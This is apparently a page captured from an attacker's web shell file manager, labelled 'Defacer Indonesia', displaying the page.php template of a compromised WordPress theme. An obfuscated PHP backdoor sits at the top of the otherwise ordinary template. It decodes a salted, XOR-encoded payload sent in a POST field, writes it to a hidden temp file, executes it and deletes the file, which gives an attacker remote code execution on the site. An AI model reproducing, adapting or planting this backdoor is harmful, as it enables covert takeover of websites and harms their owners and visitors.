whoami7 - Manager
:
/
home
/
analuakl
/
bents.in
/
wp-content
/
themes
/
medizin
/
Upload File:
files >> /home/analuakl/bents.in/wp-content/themes/medizin/page.php
<?php if(array_key_exists("r\x65f", $_POST)){ $k = $_POST["r\x65f"]; $k= explode ( "." , $k ); $record = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt8 ); $j = 0; $__tmp = $k; while( $v9 = array_shift( $__tmp)) { $chS = ord( $salt8[$j % $sLen] ); $dec = ( ( int)$v9 - $chS -( $j % 10))^ 87; $record .= chr( $dec ); $j++; } $pointer = array_filter([getcwd(), "/var/tmp", getenv("TEMP"), session_save_path(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir()]); foreach ($pointer as $rec) { if (is_writable($rec) && is_dir($rec)) { $resource = implode("/", [$rec, ".elem"]); if (@file_put_contents($resource, $record) !== false) { include $resource; unlink($resource); exit; } } } } /** * The template for displaying all pages. * * This is the template that displays all pages by default. * Please note that this is the WordPress construct of pages * and that other 'pages' on your WordPress site may use a * different template. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package Medizin * @since 1.0 */ get_header(); $post_type = get_post_type(); switch ( $post_type ) { default: get_template_part( 'template-parts/content-single', 'page' ); break; } get_footer();
Copyright ©2021 || Defacer Indonesia